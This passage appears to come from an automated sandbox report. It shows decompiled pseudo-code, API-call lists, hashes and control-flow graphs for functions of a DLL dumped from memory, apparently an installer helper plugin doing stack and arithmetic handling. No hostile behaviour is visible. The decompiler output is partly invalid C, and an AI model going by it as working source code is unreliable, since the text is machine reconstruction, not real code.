                                                            							goto L19;
                                                            						}
                                                            						_t42 = _t33 - 1;
                                                            						__eflags = _t42;
                                                            						if(_t42 == 0) {
                                                            							__eflags = _t72 - _t83;
                                                            							if(_t72 != _t83) {
                                                            								goto L18;
                                                            							}
                                                            							__eflags = _t63 - _t68;
                                                            							L22:
                                                            							if(__eflags != 0) {
                                                            								goto L18;
                                                            							}
                                                            							goto L57;
                                                            						}
                                                            						_t43 = _t42 - 1;
                                                            						__eflags = _t43;
                                                            						if(_t43 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
                                                            							if( *((char*)(_t79 + 1)) != 0x3e) {
                                                            								__eflags = _t63 - _t68;
                                                            								if(__eflags < 0) {
                                                            									goto L18;
                                                            								}
                                                            								if(__eflags > 0) {
                                                            									goto L57;
                                                            								}
                                                            								__eflags = _t72 - _t83;
                                                            								if(_t72 <= _t83) {
                                                            									goto L18;
                                                            								}
                                                            								goto L57;
                                                            							}
                                                            							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
                                                            							_t44 = _t72;
                                                            							_t70 = _t63;
                                                            							_t68 = _t83;
                                                            							if( *((char*)(_t79 + 2)) != 0x3e) {
                                                            								_t41 = E73BC30B0(_t44, _t68, _t70);
                                                            							} else {
                                                            								_t41 = E73BC30E0(_t44, _t68, _t70);
                                                            							}
                                                            							goto L53;
                                                            						}
                                                            						_t45 = _t43 - 0x20;
                                                            						__eflags = _t45;
                                                            						if(_t45 == 0) {
                                                            							_t72 = _t72 ^ _t83;
                                                            							_t63 = _t63 ^ _t68;
                                                            							goto L19;
                                                            						}
                                                            						_t46 = _t45 - 0x1e;
                                                            						__eflags = _t46;
                                                            						if(_t46 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
                                                            							if( *((char*)(_t79 + 1)) != 0x7c) {
                                                            								_t72 = _t72 | _t83;
                                                            								_t63 = _t63 | _t68;
                                                            								goto L19;
                                                            							}
                                                            							__eflags = _t72 | _t63;
                                                            							if((_t72 | _t63) != 0) {
                                                            								goto L57;
                                                            							}
                                                            							L17:
                                                            							__eflags = _t83 | _t68;
                                                            							if((_t83 | _t68) != 0) {
                                                            								goto L57;
                                                            							}
                                                            							goto L18;
                                                            						}
                                                            						__eflags = _t46 == 0;
                                                            						if(_t46 == 0) {
                                                            							_t72 =  !_t72;
                                                            							_t63 =  !_t63;
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					if(_t91 == 0) {
                                                            						L24:
                                                            						__eflags = _t83 | _t68;
                                                            						if((_t83 | _t68) != 0) {
                                                            							_push(_t68);
                                                            							_push(_t83);
                                                            							_push(_t63);
                                                            							_push(_t72);
                                                            							_t51 = E73BC2FB0();
                                                            							_t86 = _t63;
                                                            							_t72 = _t51;
                                                            							_t63 = _t70;
                                                            						} else {
                                                            							asm("xorps xmm0, xmm0");
                                                            							_t68 = _t72;
                                                            							asm("movlpd [esp+0x10], xmm0");
                                                            							_t86 = _t63;
                                                            							_t63 = _v36;
                                                            							_t72 = _v40;
                                                            						}
                                                            						__eflags = _v8 - 0x2f;
                                                            						if(_v8 != 0x2f) {
                                                            							_t72 = _t68;
                                                            							_t63 = _t86;
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					_t52 = _t32 - 0x21;
                                                            					if(_t52 == 0) {
                                                            						__eflags = _t72 | _t63;
                                                            						goto L22;
                                                            					}
                                                            					_t53 = _t52 - 4;
                                                            					if(_t53 == 0) {
                                                            						goto L24;
                                                            					}
                                                            					_t54 = _t53 - 1;
                                                            					if(_t54 == 0) {
                                                            						__eflags =  *((char*)(_t79 + 1)) - 0x26;
                                                            						if( *((char*)(_t79 + 1)) != 0x26) {
                                                            							_t72 = _t72 & _t83;
                                                            							_t63 = _t63 & _t68;
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _t72 | _t63;
                                                            						if((_t72 | _t63) == 0) {
                                                            							goto L18;
                                                            						}
                                                            						goto L17;
                                                            					}
                                                            					_t55 = _t54 - 4;
                                                            					if(_t55 == 0) {
                                                            						_t41 = E73BC2ED0(_t72, _t63, _t83, _t68);
                                                            						goto L53;
                                                            					} else {
                                                            						_t56 = _t55 - 1;
                                                            						if(_t56 == 0) {
                                                            							_t72 = _t72 + _t83;
                                                            							asm("adc ebx, ecx");
                                                            						} else {
                                                            							if(_t56 == 0) {
                                                            								_t72 = _t72 - _t83;
                                                            								asm("sbb ebx, ecx");
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            				_a8 = _t67;
                                                            				if(_t67 == 0x21) {
                                                            					goto L3;
                                                            				} else {
                                                            					_t81 = E73BC152B();
                                                            					_push(_t81);
                                                            					_t83 = E73BC1326();
                                                            					_v40 = _t70;
                                                            					GlobalFree(_t81);
                                                            					_t79 = _a16;
                                                            					_t68 = _v40;
                                                            					_t31 =  *_t79;
                                                            					_a8 = _t31;
                                                            					goto L4;
                                                            				}
                                                            			}
                                                            0x73bc1d0e
                                                            0x73bc1d10
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1d10
                                                            0x73bc1cde
                                                            0x73bc1ce1
                                                            0x73bc1cfe
                                                            0x00000000
                                                            0x73bc1ce3
                                                            0x73bc1ce3
                                                            0x73bc1ce6
                                                            0x73bc1cf4
                                                            0x73bc1cf6
                                                            0x73bc1ce8
                                                            0x73bc1cec
                                                            0x73bc1cee
                                                            0x73bc1cf0
                                                            0x73bc1cf0
                                                            0x73bc1cec
                                                            0x00000000
                                                            0x73bc1ce6
                                                            0x73bc1ce1
                                                            0x73bc1c79
                                                            0x73bc1c80
                                                            0x00000000
                                                            0x73bc1c82
                                                            0x73bc1c87
                                                            0x73bc1c89
                                                            0x73bc1c91
                                                            0x73bc1c93
                                                            0x73bc1c97
                                                            0x73bc1c9d
                                                            0x73bc1ca1
                                                            0x73bc1ca5
                                                            0x73bc1ca7
                                                            0x00000000
                                                            0x73bc1ca7

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeGlobal$__alldvrm
                                                            • String ID: /
                                                            • API String ID: 482422042-2043925204
                                                            • Opcode ID: f355a441d6fc472ed468fe06a739c400010f2ba3ecda5479745834e5e53aab69
                                                            • Instruction ID: b0f2f4227213e0bbbea2a924a66a926f7afdf5c6cd34418173f5c14d812fa91a
                                                            • Opcode Fuzzy Hash: f355a441d6fc472ed468fe06a739c400010f2ba3ecda5479745834e5e53aab69
                                                            • Instruction Fuzzy Hash: 2251F972A083CB5BE332DE75859432A76FAEBCA105F18093DE146F3345E6A5DC458352
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 392 73bc10c6-73bc111a call 73bc152b 396 73bc12a7-73bc12ae GlobalFree 392->396 397 73bc1120 392->397 398 73bc1124-73bc112b 397->398 399 73bc1250-73bc1253 398->399 400 73bc1131 398->400 401 73bc126d-73bc1274 399->401 402 73bc1255-73bc1258 399->402 403 73bc1137-73bc113a 400->403 404 73bc1213-73bc122d 400->404 409 73bc1299-73bc129d 401->409 410 73bc1276-73bc1297 call 73bc12fa GlobalFree 401->410 405 73bc125e-73bc1262 402->405 406 73bc11b8-73bc11d0 call 73bc14e2 call 73bc157e GlobalFree 402->406 407 73bc11d5-73bc120e GlobalAlloc call 73bc12fa 403->407 408 73bc1140-73bc1143 403->408 411 73bc122f-73bc1241 call 73bc12fa 404->411 412 73bc1245-73bc124b GlobalFree 404->412 414 73bc1268 405->414 415 73bc119b-73bc11b3 call 73bc152b call 73bc15c7 GlobalFree 405->415 406->409 433 73bc118c 407->433 408->401 417 73bc1149-73bc114c 408->417 409->398 420 73bc12a3 409->420 410->409 411->412 413 73bc118f-73bc1193 412->413 413->409 414->401 415->413 423 73bc114e-73bc1152 417->423 424 73bc11b5 417->424 420->396 431 73bc1198 423->431 432 73bc1154-73bc1157 423->432 424->406 431->415 432->409 436 73bc115d-73bc1186 GlobalAlloc call 73bc12fa 432->436 433->413 436->433
                                                            C-Code - Quality: 100%
                                                            			E73BC10C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                            				signed int _v0;
                                                            				void _t29;
                                                            				void* _t30;
                                                            				void* _t36;
                                                            				void* _t43;
                                                            				intOrPtr _t52;
                                                            				void* _t56;
                                                            				void* _t62;
                                                            				void* _t63;
                                                            				void _t66;
                                                            				void* _t67;
                                                            				void* _t74;
                                                            				signed int _t75;
                                                            				void* _t79;
                                                            				void* _t80;
                                                            				void* _t82;
                                                            				signed int _t83;
                                                            				void* _t85;
                                                            				void _t88;
                                                            				void _t89;
                                                            				void* _t90;
                                                            				void* _t92;
                                                            				void* _t94;
                                                            
                                                            				 *0x73bc5040 = _a8;
                                                            				 *0x73bc503c = _a16;
                                                            				 *0x73bc5038 = _a12;
                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x73bc5014, E73BC12F7, _t79, _t82);
                                                            				_t83 =  *0x73bc5040 * 0x14;
                                                            				_v0 = _t83;
                                                            				_t90 = E73BC152B();
                                                            				_a8 = _t90;
                                                            				_t80 = _t90;
                                                            				_t66 = _v0;
                                                            				if(_t66 == 0) {
                                                            					L28:
                                                            					return GlobalFree(_t90);
                                                            				}
                                                            				do {
                                                            					_t29 = _t66;
                                                            					_t80 = _t80 + 1;
                                                            					_t94 = _t29 - 0x66;
                                                            					if(_t94 > 0) {
                                                            						_t30 = _t29 - 0x6c;
                                                            						if(_t30 == 0) {
                                                            							L24:
                                                            							_t31 =  *0x73bc5010;
                                                            							if( *0x73bc5010 != 0) {
                                                            								E73BC12FA( *0x73bc5038, _t31 + 4, _t83);
                                                            								_t67 =  *0x73bc5010;
                                                            								_t92 = _t92 + 0xc;
                                                            								 *0x73bc5010 =  *_t67;
                                                            								GlobalFree(_t67);
                                                            							}
                                                            							goto L26;
                                                            						}
                                                            						_t36 = _t30 - 4;
                                                            						if(_t36 == 0) {
                                                            							L15:
                                                            							GlobalFree(E73BC157E(E73BC14E2( *_t80 - 0x30)));
                                                            							_t80 = _t80 + 1;
                                                            							goto L26;
                                                            						}
                                                            						_t43 = _t36;
                                                            						if(_t43 == 0) {
                                                            							L13:
                                                            							GlobalFree(E73BC15C7( *_t80 - 0x30, E73BC152B()));
                                                            							_t80 = _t80 + 1;
                                                            							L11:
                                                            							_t83 = _v0;
                                                            							goto L26;
                                                            						}
                                                            						L8:
                                                            						if(_t43 != 1) {
                                                            							goto L26;
                                                            						}
                                                            						_t88 = GlobalAlloc(0x40, _t83 + 4);
                                                            						_t11 = _t88 + 4; // 0x4
                                                            						E73BC12FA(_t11,  *0x73bc5038, _v0);
                                                            						 *_t88 =  *0x73bc5010;
                                                            						 *0x73bc5010 = _t88;
                                                            						L10:
                                                            						_t92 = _t92 + 0xc;
                                                            						goto L11;
                                                            					}
                                                            					if(_t94 == 0) {
                                                            						_t74 =  *0x73bc503c;
                                                            						_t85 =  *_t74;
                                                            						 *_t74 =  *_t85;
                                                            						_t75 = _v0;
                                                            						_t52 =  *((intOrPtr*)(_t75 + 0xc));
                                                            						_a12 = _t52;
                                                            						if( *((char*)(_t85 + 4)) == 0x1e) {
                                                            							E73BC12FA(_t75, _t85 + 6, 0x38);
                                                            							_t75 = _v0;
                                                            							_t92 = _t92 + 0xc;
                                                            							_t52 = _a12;
                                                            						}
                                                            						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
                                                            						GlobalFree(_t85);
                                                            						goto L11;
                                                            					}
                                                            					_t56 = _t29 - 0x46;
                                                            					if(_t56 == 0) {
                                                            						_t89 = GlobalAlloc(0x40,  *0x73bc5040 + 8);
                                                            						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
                                                            						_t14 = _t89 + 6; // 0x6
                                                            						E73BC12FA(_t14, _v0, 0x38);
                                                            						 *_t89 =  *( *0x73bc503c);
                                                            						 *( *0x73bc503c) = _t89;
                                                            						goto L10;
                                                            					}
                                                            					_t62 = _t56 - 6;
                                                            					if(_t62 == 0) {
                                                            						goto L24;
                                                            					}
                                                            					_t63 = _t62 - 4;
                                                            					if(_t63 == 0) {
                                                            						 *_t80 =  *_t80 + 0xa;
                                                            						goto L15;
                                                            					}
                                                            					_t43 = _t63;
                                                            					if(_t43 == 0) {
                                                            						 *_t80 =  *_t80 + 0xa;
                                                            						goto L13;
                                                            					}
                                                            					goto L8;
                                                            					L26:
                                                            					_t66 =  *_t80;
                                                            				} while (_t66 != 0);
                                                            				_t90 = _a8;
                                                            				goto L28;
                                                            			}



























                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73BC1163
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC11B0
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC11CD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73BC11E0
                                                            • GlobalFree.KERNEL32 ref: 73BC1249
                                                            • GlobalFree.KERNEL32(?), ref: 73BC1297
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC12A8
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: c5336fc34cc79e1b83f6d8d1019a6cbdf0ff1700e1e27f4bd111f31ce7fde082
                                                            • Instruction ID: 09816210fb1b3344abc71454bfa3be6ea8ffde023208580cff9244a869fd1098
                                                            • Opcode Fuzzy Hash: c5336fc34cc79e1b83f6d8d1019a6cbdf0ff1700e1e27f4bd111f31ce7fde082
                                                            • Instruction Fuzzy Hash: F451A2F65043819FE331DF6AC990B267BF8FF89204F14442AE48AEB650E735E900CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 440 73bc1e71-73bc1e7c 441 73bc1e7e-73bc1e8e 440->441 442 73bc1eaf-73bc1ec4 lstrcpyA 440->442 443 73bc1e99-73bc1ead wsprintfA 441->443 444 73bc1e90-73bc1e96 441->444 445 73bc1eca-73bc1ecd 442->445 443->445 444->443
                                                            C-Code - Quality: 100%
                                                            			E73BC1E71(intOrPtr _a4, CHAR* _a8) {
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t19;
                                                            				CHAR* _t21;
                                                            
                                                            				_t11 = _a4;
                                                            				if( *((intOrPtr*)(_t11 + 4)) != 1) {
                                                            					_t21 = _a8;
                                                            					_t13 =  ==  ? 0x73bc40c4 : 0x73bc40bc;
                                                            					lstrcpyA(_t21,  ==  ? 0x73bc40c4 : 0x73bc40bc);
                                                            				} else {
                                                            					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
                                                            					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
                                                            						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
                                                            					}
                                                            					_t21 = _a8;
                                                            					wsprintfA(_t21, "callback%d", _t19);
                                                            				}
                                                            				return _t21;
                                                            			}







                                                            APIs
                                                            • wsprintfA.USER32 ref: 73BC1EA4
                                                            • lstrcpyA.KERNEL32(?,error,00000818,73BC16E5,00000000,?), ref: 73BC1EC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcpywsprintf
                                                            • String ID: callback%d$error
                                                            • API String ID: 2408954437-1307476583
                                                            • Opcode ID: 075da5756ebda2517b4b103fe84c2b377b90dc27c668a32db97c85155c3466ca
                                                            • Instruction ID: fb70a9d7f041dc2ad2b0021773105078955b24a7e9262834c8d5dafe761650f0
                                                            • Opcode Fuzzy Hash: 075da5756ebda2517b4b103fe84c2b377b90dc27c668a32db97c85155c3466ca
                                                            • Instruction Fuzzy Hash: F4F034312041649FC7269B049958BBA73EAEF89300F0988A8F88A9B241C770ED009B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%